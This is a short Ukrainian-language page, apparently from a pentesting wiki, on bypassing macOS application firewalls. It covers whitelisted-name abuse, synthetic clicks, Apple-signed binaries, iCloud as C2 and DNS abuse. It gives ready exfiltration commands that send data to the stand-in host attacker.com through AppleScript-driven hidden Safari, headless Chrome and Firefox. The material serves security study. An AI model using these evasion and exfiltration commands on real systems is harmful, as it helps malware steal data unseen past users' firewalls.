macOS Bypassing Firewalls

Знайдені техніки

Наступні техніки були виявлені як працюючі в деяких додатках брандмауерів macOS.

Зловживання іменами білого списку

• Наприклад, назви шкідливих програм можуть бути викликані іменами відомих процесів macOS, таких як launchd

Синтетичний клік

• Якщо брандмауер запитує дозвіл від користувача, шкідлива програма може клацнути на дозвіл

Використання підписаних бінарних файлів Apple

• Наприклад, curl, а також інші, такі як whois

Відомі домени Apple

Брандмауер може дозволяти підключення до відомих доменів Apple, таких як apple.com або icloud.com. І iCloud може бути використаний як C2.

Загальний обхід

Деякі ідеї для спроб обійти брандмауери

Перевірка дозволеного трафіку

Знання дозволеного трафіку допоможе вам визначити потенційно включені в білий список домени або додатки, які мають до них доступ.

lsof -i TCP -sTCP:ESTABLISHED

Зловживання DNS

DNS-розрішення виконується за допомогою підписаної програми mdnsreponder, яка, ймовірно, буде дозволена звертатися до DNS-серверів.

Через програми браузера

• oascript

tell application "Safari"
run
tell application "Finder" to set visible of process "Safari" to false
make new document
set the URL of document 1 to "https://attacker.com?data=data%20to%20exfil
end tell

• Google Chrome

"Google Chrome" --crash-dumps-dir=/tmp --headless "https://attacker.com?data=data%20to%20exfil"

• Firefox

firefox-bin --headless "https://attacker.com?data=data%20to%20exfil"

• Сафарі

open -j -a Safari "https://attacker.com?data=data%20to%20exfil"

Через внедрення процесів

Якщо ви можете впровадити код в процес, який має дозвіл на підключення до будь-якого сервера, ви можете обійти захист брандмауера:

Посилання

• https://www.youtube.com/watch?v=UlT5KFTMn2k